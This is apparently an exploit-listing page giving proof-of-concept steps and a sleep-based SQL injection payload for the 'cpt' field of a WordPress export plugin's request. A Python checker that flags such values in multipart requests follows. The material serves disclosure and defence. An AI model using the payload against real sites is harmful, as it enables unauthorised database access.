## https://sploitus.com/exploit?id=WPEX-ID:4267109C-0CA2-441D-889D-FB39C235F128
1. Go to the All Export > New Export screen in the WordPress admin.
2. Click Specific Post Type > Posts.
3. Click Migrate Posts, intercept the resulting request, and find the form field named cpt:

Content-Disposition: form-data; name="cpt"
post

Change it to:

Content-Disposition: form-data; name="cpt"
post'+(select*from(select(sleep(10)))a)+'

The response now arrives about 10 seconds late, which shows that the injected sleep(10) was executed by the database and confirms the SQL injection vulnerability.
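
A defender-side check for the request described above, as an added example that is not part of the original page or the plugin's code: it parses a multipart/form-data body and flags a cpt value that is not a plausible WordPress post type key. The allowed-character rule, the function names and the sample requests are assumptions made for the illustration.

```python
import email
import re

# Assumption: a legitimate cpt value is a WordPress post type key, which
# sanitize_key() restricts to lowercase letters, digits, "-" and "_", and
# register_post_type() caps at 20 characters.
POST_TYPE_KEY = re.compile(r"[a-z0-9_-]{1,20}")


def multipart_fields(content_type, body):
    """Return {field name: text value} for a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    fields = {}
    if not msg.is_multipart():
        return fields
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        if name is not None:
            data = part.get_payload(decode=True) or b""
            fields[name] = data.decode("utf-8", "replace").strip()
    return fields


def check_cpt(content_type, body):
    """Return a finding string when cpt is not a plausible post type key."""
    value = multipart_fields(content_type, body).get("cpt")
    if value is None or POST_TYPE_KEY.fullmatch(value):
        return None
    bad = sorted(set(re.sub(r"[a-z0-9_-]", "", value)))
    return f"cpt rejected: length {len(value)}, unexpected characters {bad}"


# Constructed sample requests (boundary and layout are made up for the demo).
CONTENT_TYPE = "multipart/form-data; boundary=demo-boundary"


def sample_body(cpt_value):
    return (
        "--demo-boundary\r\n"
        'Content-Disposition: form-data; name="cpt"\r\n'
        "\r\n"
        f"{cpt_value}\r\n"
        "--demo-boundary--\r\n"
    ).encode()


if __name__ == "__main__":
    for value in ("post", "post'+(select*from(select(sleep(10)))a)+'"):
        print(repr(value), "->", check_cpt(CONTENT_TYPE, sample_body(value)))
```

The same rule can be applied server-side before the value reaches a query, or in a WAF or log pipeline that sees the export request.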